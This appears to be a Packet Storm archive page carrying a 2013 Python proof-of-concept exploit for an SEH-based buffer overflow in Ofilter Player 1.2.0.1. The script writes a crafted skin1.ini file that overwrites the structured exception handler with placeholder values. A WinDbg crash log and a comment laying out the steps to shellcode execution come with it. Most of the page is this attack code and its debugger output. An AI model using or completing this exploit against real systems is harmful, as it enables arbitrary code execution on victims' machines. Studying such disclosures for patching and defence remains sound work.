what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Ofilter Player 1.2.0.1 Buffer Overflow

Ofilter Player 1.2.0.1 Buffer Overflow
Posted Sep 12, 2013
Authored by gunslinger

Ofilter Player version 1.2.0.1 SEH based buffer overflow exploit.

tags | exploit, overflow
SHA-256 | 065674883829ffa506db5184e414b21c45b8ef30ef86f9e87e8212600f06f337

Ofilter Player 1.2.0.1 Buffer Overflow

Change Mirror Download
# Exploit Title     : Ofilter Player Version 1.2.0.1 - (skin1.ini) - SEH Based Buffer Overflow PoC
# Date : 12-09-2013
# Exploit Author : gunslinger_ <yuda at cr0security.com>
# Author Homepage : http://www.cr0security.com
# Software Link : http://download.cnet.com/Ofilter-Player/3000-2139_4-78232.html
# Price : Free to try; $19.99 to buy
# Version : 1.2.0.1 (Probably old version of software and the LATEST version too)
# Vendor : DigitByte Studio
# Vendor Homepage : http://www.008soft.com/
# Tested on : Windows XP SP3
#============================================================================================
# Ofilter Player is Prone to a SEH based Buffer Overflow which allows attacker to execute arbitary code on the victim's machine.
# To trigger the vulnerability the attacker must rewrite file skin1.ini inside /skin folder on Ofilter Player installed folder.
# Then run Ofilter Player, and EIP will be overwritten with the SEH address when the program initialize to read variable from skin1.ini file (see debug result below).
# The Exploit will look like this : [Junk "A" x 360] [6 Bytes Jump + 2Nops ] [pop pop ret address / others] [Shellcode] .
# Crash Triggered + Seh Overwritten .
#============================================================================================
#!/usr/bin/python
'''
0:000> g
ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
(658.3f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000018c ebx=00000000 ecx=41414141 edx=0012df77 esi=00000171 edi=00000171
eip=0040161d esp=0012ddc4 ebp=0012df08 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x161d:
0040161d 8b41f4 mov eax,dword ptr [ecx-0Ch] ds:0023:41414135=????????
0:000> g
(658.3f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=bbbbbbbb edx=7c9032bc esi=00000000 edi=00000000
eip=bbbbbbbb esp=0012d9f4 ebp=0012da14 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
bbbbbbbb ?? ???
0:000> !exchain
0012da08: ntdll!ExecuteHandler2+3a (7c9032bc)
0012df54: bbbbbbbb
Invalid exception stack at cccccccc
'''
from struct import pack
filename = "skin1.ini"
junk = "\x41" * 360
nextSEH = "\xcc\xcc\xcc\xcc"
SEH = "\xbb\xbb\xbb\xbb"

trigger_seh = junk + nextSEH + SEH

ini_content = """[BACKGROUND]
Mask=GoldMask.bmp
Main=GoldMain.bmp
Selected=GoldSelected.bmp
Over=GoldOver.bmp
Disabled=GoldDisable.bmp

[BUTTON]
1=ID_FILE_EXIT,273,10,9,9,Exit,FALSE
2=ID_BUTTON_MINIMIZE,261,10,9,9,MINIMIZE,FALSE
3=IDC_BUTTON1_FILELIST_LOOP,229,85,42,21,FILE,FALSE
4=ID_JUMP_FORWARD,103,91,16,15,Skip Forward,FALSE
5=ID_PLAYBACK_NEXTCHAPTER,119,91,16,15,Next,FALSE
6=ID_PLAYBACK_PREVIOUSCHAPTER,23,91,16,15,Previous,FALSE
7=ID_PLAYBACK_STOP,86,91,17,15,Stop,FALSE
8=ID_PLAYBACK_PAUSE,71,91,15,15,Pause,FALSE
9=ID_PLAYBACK_PLAY,53,91,18,15,Play,FALSE
10=ID_JUMP_BACKWARD,38,91,15,15,Skip Backward,FALSE
11=ID_FILE_SELECTDISC,145,85,41,21,Open Media Files,FALSE
12=ID_WEBSITE,117,8,69,16,Website,FALSE
13=%s,186,85,42,21,Open VCD,FALSE
14=ID_POPUP_HELP,251,10,9,9,Popup,FALSE

[TRACKBARINFO]
1=IDC_SLIDER1_PLAYBACK_POSITION,Goldbutton1.bmp,Goldbutton1.bmp,23,69,247,6,H,100
2=IDC_SLIDER1_VOLUME,Goldbutton2.bmp,Goldbutton2.bmp,23,79,113,6,H,100

[PLAY]
1=ID_PLAYBACK_TIME,Arial,TRUE,TRUE,-14,32768,100,43,160,16,
2=PLAY,Arial,TRUE,TRUE,-14,32768,34,43,50,16,10""" % (trigger_seh)

textfile = open(filename , 'wb')
textfile.write(ini_content)
textfile.close()
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close